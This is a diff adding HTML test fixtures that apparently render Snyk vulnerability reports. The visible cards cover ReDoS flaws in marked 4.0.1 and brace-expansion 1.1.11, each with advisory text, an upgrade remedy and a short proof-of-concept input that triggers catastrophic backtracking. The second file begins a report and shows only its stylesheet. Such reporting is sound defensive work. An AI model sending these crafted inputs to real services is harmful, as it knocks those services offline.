+      <li class="card-meta-item">CWE-1333</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item" style="color:#AB1A1A;font-weight:600">Reachable</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> marked@4.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">snyk@1.0.0-monorepo &#x203A; marked@4.0.1</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://marked.js.org/" target="_blank" rel="noopener noreferrer">marked</a> is a low-level compiler for parsing markdown without caching or blocking for long periods of time.</p><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when passing unsanitized user input to <code>inline.reflinkSearch</code>, if it is not being parsed by a time-limited worker thread.</p><h2>PoC</h2><pre><code>import * as marked from &#39;marked&#39;;
+
+console.log(marked.parse(`[x]: x
+
+\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](\\[\\](`));
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>marked</code> to version 4.0.10 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/markedjs/marked/commit/c4a3ccd344b6929afa8a1d50ac54a721e57012c0" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-MARKED-2342073" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--medium">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#D68000">M</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-MARKED-2342082</li>
+      <li class="card-meta-item">CWE-1333</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item" style="color:#AB1A1A;font-weight:600">Reachable</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> marked@4.0.1</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">snyk@1.0.0-monorepo &#x203A; marked@4.0.1</div>
+    </div>
+    <div class="issue-summary severity--medium">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://marked.js.org/" target="_blank" rel="noopener noreferrer">marked</a> is a low-level compiler for parsing markdown without caching or blocking for long periods of time.</p><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) when unsanitized user input is passed to <code>block.def</code>.</p><h2>PoC</h2><pre><code>import * as marked from &#34;marked&#34;;
+marked.parse(`[x]:${&#39; &#39;.repeat(1500)}x ${&#39; &#39;.repeat(1500)} x`);
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>marked</code> to version 4.0.10 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/markedjs/marked/commit/c4a3ccd344b6929afa8a1d50ac54a721e57012c0" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://github.com/markedjs/marked/releases/tag/v4.0.10" target="_blank" rel="noopener noreferrer">GitHub Release</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-MARKED-2342082" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+      <div class="issue-card severity--low">
+  <div class="card-header">
+    <div class="card-header-main">
+      <div class="severity-icon" style="background:#88879E">L</div>
+      <h3>Regular Expression Denial of Service (ReDoS)</h3>
+    </div>
+    <ul class="card-meta">
+      <li class="card-meta-item">SNYK-JS-BRACEEXPANSION-9789073</li>
+      <li class="card-meta-item">CWE-1333</li>
+      <li class="card-meta-item">Security</li>
+      <li class="card-meta-item">No Path Found</li>
+    </ul>
+  </div>
+  <div class="card-section">
+    <div class="card-detail"><span class="detail-label">Vulnerable module:</span> brace-expansion@1.1.11</div>
+    <div class="card-detail"><span class="detail-label">Introduced through:</span>
+      <div class="dep-path">snyk@1.0.0-monorepo &#x203A; glob@7.2.3 &#x203A; minimatch@3.1.2 &#x203A; brace-expansion@1.1.11</div>
+      <details class="dep-paths-toggle">
+        <summary><span class="toggle-more">Show 7 more paths</span><span class="toggle-less">Show less</span></summary>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-docker-plugin@8.8.1 &#x203A; minimatch@3.1.2 &#x203A; brace-expansion@1.1.11</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; @snyk/code-client@4.23.5 &#x203A; multimatch@5.0.0 &#x203A; minimatch@3.1.2 &#x203A; brace-expansion@1.1.11</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; rimraf@2.7.1 &#x203A; glob@7.2.3 &#x203A; minimatch@3.1.2 &#x203A; brace-expansion@1.1.11</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-mvn-plugin@4.3.2 &#x203A; glob@7.2.3 &#x203A; minimatch@3.1.2 &#x203A; brace-expansion@1.1.11</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-sbt-plugin@3.1.0 &#x203A; tmp@0.1.0 &#x203A; rimraf@2.7.1 &#x203A; glob@7.2.3 &#x203A; minimatch@3.1.2 &#x203A; brace-expansion@1.1.11</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-go-plugin@1.23.0 &#x203A; tmp@0.2.1 &#x203A; rimraf@3.0.2 &#x203A; glob@7.2.3 &#x203A; minimatch@3.1.2 &#x203A; brace-expansion@1.1.11</div>
+        <div class="dep-path">snyk@1.0.0-monorepo &#x203A; snyk-gradle-plugin@5.1.0 &#x203A; tmp@0.2.1 &#x203A; rimraf@3.0.2 &#x203A; glob@7.2.3 &#x203A; minimatch@3.1.2 &#x203A; brace-expansion@1.1.11</div>
+      </details>
+    </div>
+    <div class="issue-summary severity--low">
+      <div class="issue-description"><h2>Overview</h2><p><a href="https://github.com/juliangruber/brace-expansion" target="_blank" rel="noopener noreferrer">brace-expansion</a> is a Brace expansion as known from sh/bash</p><p>Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the <code>expand()</code> function, which is prone to catastrophic backtracking on very long malicious inputs.</p><h2>PoC</h2><pre><code>import index from &#34;./index.js&#34;;
+
+let str = &#34;{a}&#34; + &#34;,&#34;.repeat(100000) + &#34;\u0000&#34;;
+
+let startTime = performance.now();
+
+const result = index(str);
+
+let endTime = performance.now();
+
+let timeTaken = endTime - startTime;
+
+console.log(`匹配耗时: ${timeTaken.toFixed(3)} 毫秒`);
+</code></pre><h2>Details</h2><p>Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.</p><p>The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren&#39;t very intuitive and can ultimately end up making it easy for attackers to take your site down.</p><p>Let’s take the following regular expression as an example:</p><pre><code>regex = /A(B|C+)+D/
+</code></pre><p>This regular expression accomplishes the following:</p><ul><li><code>A</code> The string must start with the letter &#39;A&#39;</li><li><code>(B|C+)+</code> The string must then follow the letter A with either the letter &#39;B&#39; or some number of occurrences of the letter &#39;C&#39; (the <code>+</code> matches one or more times). The <code>+</code> at the end of this section states that we can look for one or more matches of this section.</li><li><code>D</code> Finally, we ensure this section of the string ends with a &#39;D&#39;</li></ul><p>The expression would match inputs such as <code>ABBD</code>, <code>ABCCCCD</code>, <code>ABCBCCCD</code> and <code>ACCCCCD</code></p><p>It most cases, it doesn&#39;t take very long for a regex engine to find a match:</p><pre><code>$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD&#34;)&#39;
+0.04s user 0.01s system 95% cpu 0.052 total
+
+$ time node -e &#39;/A(B|C+)+D/.test(&#34;ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX&#34;)&#39;
+1.79s user 0.02s system 99% cpu 1.812 total
+</code></pre><p>The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.</p><p>Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.</p><p>Let&#39;s look at how our expression runs into this problem, using a shorter string: &#34;ACCCX&#34;. While it seems fairly straightforward, there are still four different ways that the engine could match those three C&#39;s:</p><ol><li>CCC</li><li>CC+C</li><li>C+CC</li><li>C+C+C.</li></ol><p>The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use <a href="https://regex101.com/debugger" target="_blank" rel="noopener noreferrer">RegEx 101 debugger</a> to see the engine has to take a total of 38 steps before it can determine the string doesn&#39;t match.</p><p>From there, the number of steps the engine must use to validate a string just continues to grow.</p><table><thead><tr><th>String</th><th>Number of C&#39;s</th><th>Number of steps</th></tr></thead><tbody><tr><td>ACCCX</td><td>3</td><td>38</td></tr><tr><td>ACCCCX</td><td>4</td><td>71</td></tr><tr><td>ACCCCCX</td><td>5</td><td>136</td></tr><tr><td>ACCCCCCCCCCCCCCX</td><td>14</td><td>65,553</td></tr></tbody></table><p>By the time the string includes 14 C&#39;s, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.</p><h2>Remediation</h2><p>Upgrade <code>brace-expansion</code> to version 1.1.12, 2.0.2, 3.0.1, 4.0.1 or higher.</p><h2>References</h2><ul><li><a href="https://github.com/advisories/GHSA-v6h2-p8h4-qcjw" target="_blank" rel="noopener noreferrer">GitHub Advisory</a></li><li><a href="https://github.com/juliangruber/brace-expansion/commit/0b6a9781e18e9d2769bb2931f4856d1360243ed2" target="_blank" rel="noopener noreferrer">GitHub Commit</a></li><li><a href="https://gist.github.com/mmmsssttt404/37a40ce7d6e5ca604858fe30814d9466" target="_blank" rel="noopener noreferrer">GitHub Gist</a></li><li><a href="https://github.com/juliangruber/brace-expansion/pull/65" target="_blank" rel="noopener noreferrer">GitHub PR</a></li></ul></div>
+    </div>
+    <div class="vuln-link"><a href="https://snyk.io/vuln/SNYK-JS-BRACEEXPANSION-9789073" target="_blank" rel="noopener noreferrer">More about this vulnerability</a></div>
+  </div>
+</div>
+    </details>
+</section>
+</div>
+</main>
+</body>
+</html>

--- a/internal/presenters/testdata/ufm/multi_project.html
+++ b/internal/presenters/testdata/ufm/multi_project.html
@@ -1,0 +1,2269 @@
+<!doctype html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<meta name="description" content="67 open issues.">
+<title>Snyk Test Report</title><style>
+*{box-sizing:border-box;margin:0;padding:0}
+html{scrollbar-gutter:stable}
+body{font-family:-apple-system,BlinkMacSystemFont,avenir next,avenir,segoe ui,helvetica neue,helvetica,Ubuntu,roboto,noto,arial,sans-serif;background:#F5F5F5;color:#393842;line-height:1.5;font-size:100%}
+h1,h2,h3,h4,h5,h6{font-weight:500}
+a,a:link,a:visited{color:#4b45a9;text-decoration:none;border-bottom:1px solid #4b45a9}
+a:hover,a:focus,a:active{opacity:.8}
+a[href^="http://"]:after,a[href^="https://"]:after{background-image:linear-gradient(transparent,transparent),url("data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20112%20109%22%3E%3Cg%20fill%3D%22none%22%20fill-rule%3D%22evenodd%22%3E%3Cg%3E%3Cg%3E%3Cpath%20stroke%3D%22%234B45A9%22%20stroke-width%3D%2215%22%20d%3D%22M88.5%2021l-43%2042.5%22%20stroke-linecap%3D%22square%22%2F%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M111.2%200v50L61%200z%22%2F%3E%3C%2Fg%3E%3Cpath%20fill%3D%22%234B45A9%22%20d%3D%22M66%2015H0v94h94V44L79%2059v35H15V30h36z%22%2F%3E%3C%2Fg%3E%3C%2Fg%3E%3C%2Fsvg%3E");background-repeat:no-repeat;background-size:.75rem;content:"";display:inline-block;height:.75rem;margin-left:.25rem;width:.75rem}
+hr{border:none;margin:1em 0;border-top:1px solid #d3d3d9}
+code{background-color:#EEE;color:#333;padding:0.25em 0.5em;border-radius:0.25em}
+pre{font-size:14px}
+pre code{padding:10px;font-family:monospace;background-color:#393842;border-radius:4px;color:#fff;display:block;white-space:pre-wrap;overflow-x:auto}
+a code{border-radius:.125rem .125rem 0 0;padding-bottom:0;color:#4b45a9}
+.brand,.brand:link,.brand:visited{display:inline-block;border:none}
+.brand::after{background:none !important;width:0 !important;height:0 !important;content:none !important}
+.report-header{background:#030328;color:#fff;padding:20px 0}
+.report-header .header-inner{max-width:71.25rem;margin:0 auto;padding:0 20px}
+.report-header .header-top{display:flex;justify-content:space-between;align-items:flex-start}
+.report-header .brand svg{display:block}
+.report-header .brand:hover{opacity:.8}
+.report-header h1{font-size:24px;font-weight:500;margin:16px 0 12px}
+.report-header .test-meta{text-align:right;font-size:12px;opacity:.75;max-width:500px}
+.report-header .test-meta .timestamp{margin:0 0 6px}
+.report-header .meta-counts{display:flex;flex-wrap:wrap;gap:4px 0}
+.report-header .meta-count{display:inline-block;margin:0 12px 6px 0;padding-right:12px;border-right:2px solid rgba(255,255,255,.3);font-size:14px}
+.report-header .meta-count:last-child{border-right:none;padding-right:0}
+.container{max-width:71.25rem;margin:0 auto;padding:20px}.container + .container{padding-top:8px;margin-top:20px;border-top:1px solid #e8e8ec}
+.project-summary{background:#fff;border:1px solid #d3d3d9;border-left:5px solid #4B45A9;border-radius:0 4px 4px 0;margin-bottom:24px;overflow:hidden;box-shadow:0 1px 3px rgba(0,0,0,.08)}
+.project-summary .summary-meta{padding:14px 20px;display:grid;grid-template-columns:auto 1fr;gap:4px 12px;font-size:14px;color:#393842}
+.project-summary .meta-label{color:#727184;white-space:nowrap}
+.project-summary .meta-value{color:#393842;word-break:break-word}
+.project-summary .summary-counts{padding:14px 20px;border-top:1px solid #e8e8ec;display:grid;grid-template-columns:auto repeat(4,auto);gap:8px 6px;align-items:center}
+.project-summary .summary-counts .summary-label{font-weight:700;font-size:14px;white-space:nowrap;color:#393842}
+.project-summary .summary-counts .summary-label.ignored-label{color:#727184}
+.severity-badge{padding:4px 10px;border-radius:3px;font-size:12px;font-weight:700;color:#fff;display:inline-block;text-align:center;min-width:70px}
+.severity-badge--zero{background:transparent !important;border:1px solid #d3d3d9;color:#a0a0a0}
+.severity-badge--ignored{opacity:.55}
+.finding-type-section{margin-bottom:32px}
+.finding-type-section[open]{border-bottom:2px solid #e0e0e0}
+.finding-type-section summary{cursor:pointer;list-style:none;padding-bottom:8px}
+.finding-type-section summary::-webkit-details-marker{display:none}
+.finding-type-header{font-size:18px;font-weight:600;margin:0;color:#333;display:flex;align-items:center}
+.finding-type-header .chevron{width:1em;height:1em;margin-right:6px;flex-shrink:0;transition:transform .15s ease}
+.finding-type-header .chevron path{fill:#586069}
+.finding-type-section[open] .finding-type-header .chevron{transform:rotate(90deg)}
+.issue-card{background:#fff;border:1px solid #d3d3d9;border-radius:4px;border-top-width:4px;margin-bottom:20px;position:relative;overflow:hidden}
+.issue-card.severity--critical{border-top-color:#AB1A1A}
+.issue-card.severity--high{border-top-color:#CE5019}
+.issue-card.severity--medium{border-top-color:#D68000}
+.issue-card.severity--low{border-top-color:#88879E}
+.issue-card .card-header{padding:24px}
+.issue-card .card-header-main{display:flex;align-items:flex-start}
+.issue-card .severity-icon{flex-shrink:0;width:32px;height:32px;border-radius:4px;margin-right:12px;display:flex;align-items:center;justify-content:center;color:#fff;font-size:14px;font-weight:700}
+.issue-card h3{display:inline;font-size:22px;font-weight:600;color:#393842;vertical-align:top;margin:0}
+.issue-card .card-meta{display:flex;flex-wrap:wrap;align-items:flex-start;margin:10px 0 0;padding:0;list-style:none}
+.issue-card .card-meta-item{display:inline-block;padding-right:8px;border-right:1px solid #eee;margin-right:8px;font-size:12px;color:#727184}
+.issue-card .card-meta-item:last-child{border-right:none;padding-right:0;margin-right:0}
+.issue-card .risk-score{position:absolute;top:24px;right:24px;text-align:right}
+.issue-card .risk-score__label{font-size:11px;font-weight:700;color:#586069;text-transform:uppercase;line-height:1;margin-bottom:3px}
+.issue-card .risk-score__value{font-size:30px;font-weight:600;color:#24292e;line-height:1}
+.issue-card .card-section{padding:24px;border-top:1px solid #d3d3d9;background-color:#faf9fa}
+.issue-card .card-detail{font-size:14px;color:#586069;margin-bottom:8px}
+.issue-card .card-detail .detail-label{font-weight:600;color:#393842}
+.dep-path{margin:2px 0 2px 16px;font-size:13px}
+.dep-paths-toggle{margin:4px 0 0 0;font-size:13px}
+.dep-paths-toggle summary{cursor:pointer;color:#4b45a9;font-size:12px;margin:2px 0 2px 16px;list-style:none}
+.dep-paths-toggle summary::-webkit-details-marker{display:none}
+.dep-paths-toggle summary::before{content:"▸ "}
+.dep-paths-toggle[open] summary::before{content:"▾ "}
+.dep-paths-toggle .toggle-less{display:none}
+.dep-paths-toggle[open] .toggle-more{display:none}
+.dep-paths-toggle[open] .toggle-less{display:inline}
+.issue-card .vuln-link{margin-top:16px;font-size:13px}
+.issue-description{font-size:14px;color:#393842;margin-top:16px;line-height:1.6}
+.issue-description h2{font-size:18px;font-weight:600;margin:16px 0 8px;color:#393842}
+.issue-description h3{font-size:16px;font-weight:600;margin:14px 0 6px;color:#393842}
+.issue-description p{margin:0 0 12px}
+.issue-description ul,.issue-description ol{margin:6px 0 12px 20px}
+.issue-description li{margin:2px 0}
+.issue-description code{background:#eee;color:#333;padding:1px 4px;border-radius:3px;font-size:13px}
+.issue-description pre{margin:8px 0}
+.issue-description pre code{font-size:13px}
+.issue-description hr{border:none;border-top:1px solid #e0e0e0;margin:12px 0}
+.issue-description table{border-collapse:collapse;margin:8px 0;width:100%;border:1px solid #d3d3d9;border-radius:3px}
+.issue-description th,.issue-description td{border:1px solid #d3d3d9;padding:6px 10px;text-align:left;font-size:13px}
+.issue-description th{background:#f5f5f5;font-weight:600}
+.issue-description td{background:#fff}
+.issue-description a{color:#4b45a9}
+.issue-summary{position:relative;padding:16px 24px;border:1px solid #d3d3d9;border-left-width:4px;border-radius:2px;background-color:#fff;color:#393842;word-break:break-word;margin-top:16px}
+.issue-summary.severity--critical{border-left-color:#AB1A1A}
+.issue-summary.severity--high{border-left-color:#CE5019}
+.issue-summary.severity--medium{border-left-color:#D68000}
+.issue-summary.severity--low{border-left-color:#88879E}
+.issue-summary .issue-description{margin-top:0}
+.issue-summary .file-location{margin-top:10px;font-size:13px;color:#727184}
+.issue-summary .file-location + .file-location{margin-top:4px}
+.card-section > .issue-summary:first-child{margin-top:0}
+.issue-summary .issue-description h2{font-size:15px;margin:12px 0 6px}
+.issue-summary .issue-description h3{font-size:14px;margin:10px 0 4px}
+.issue-summary a[href^="http://"]:after,.issue-summary a[href^="https://"]:after{display:none}
+.no-issues{font-size:15px;color:#586069;padding:12px 0}
+.issue-card.ignored{opacity:.75}
+.issue-card.ignored .card-header{background:#faf9fa}
+.ignored-badge{display:inline-block;background:#727184;color:#fff;font-size:11px;font-weight:700;padding:2px 8px;border-radius:3px;margin-left:10px;vertical-align:middle;text-transform:uppercase;letter-spacing:.5px}
+.ignore-details{background:#f0eff4;padding:16px 24px;border-top:1px solid #d3d3d9;font-size:13px;color:#586069}
+.ignore-details .ignore-detail{margin-bottom:4px}
+.ignore-details .ignore-label{font-weight:600;color:#393842;display:inline-block;min-width:100px}
+.ignored-section{margin-top:20px;padding-top:14px;border-top:1px solid #e8e8ec}
+.ignored-section-header{font-size:16px;font-weight:600;margin:0 0 12px;color:#727184}
+.dataflow{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.dataflow__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.dataflow__heading .heading-char{margin-right:6px;font-size:18px}
+.dataflow__filename{padding:6px 12px;border:1px solid #eee;border-radius:4px;margin:12px 0 6px;font-size:13px;color:#393842;background-color:#fff}
+.dataflow__item{display:flex;align-items:center;padding:4px 8px;font-family:monospace;color:#393842;font-size:14px;border:1px solid transparent;border-width:1px 0}
+.dataflow__item:hover{border-color:#eee;background-color:#fff}
+.dataflow__step{flex:0 0 30px;width:30px;text-align:right;color:#727184;font-size:12px}
+.dataflow__lineno{flex:0 0 60px;padding:0 12px 0 8px;text-align:right;color:#727184;font-size:12px}
+.dataflow__code{flex:1;font-family:monospace;font-size:13px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}
+.dataflow__code .marker{padding:2px 6px;border-radius:4px;background-color:rgba(0,0,0,.1);white-space:nowrap}
+.dataflow__item:hover .marker{background-color:#ffc905}
+.dataflow__badge{padding:2px 3px;border:1px solid #d3d3d9;border-radius:2px;margin-left:8px;background-color:#f4f4f6;font-size:11px;line-height:1;font-family:sans-serif;text-transform:uppercase;color:#646374}
+.card-tab-radio{display:none}
+.card-tab-bar{display:flex;padding:6px 24px;border-top:1px solid #d3d3d9;background:#f5f5f5;gap:4px}
+.card-tab-label{padding:5px 15px;font-size:14px;cursor:pointer;border-radius:20px;border:1px solid #d3d3d9;background:#fff;transition:all .2s}
+.card-tab-label:hover{color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .dataflow{display:block}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-section .fix-analysis{display:none}
+.issue-card .card-tab-radio[id^="tab-df"]:checked ~ .card-tab-bar label[for^="tab-df"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .fix-analysis{display:block}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-section .dataflow{display:none}
+.issue-card .card-tab-radio[id^="tab-fa"]:checked ~ .card-tab-bar label[for^="tab-fa"]{background:#4b45a1;color:#fff;border-color:#4b45a1}
+.fix-analysis{margin:16px 0 0;border-top:1px solid #e0e0e0;padding-top:12px}
+.card-tab-bar ~ .card-section .dataflow{border-top:none;padding-top:0}
+.card-tab-bar ~ .card-section .fix-analysis{border-top:none;padding-top:0}
+.dataflow__filename:first-child{margin-top:0}
+.fix-analysis__heading{font-size:15px;font-weight:600;color:#393842;margin:0 0 8px;display:flex;align-items:center}
+.fix-analysis__heading .heading-char{margin-right:6px;font-size:18px;color:#2a7b3f}
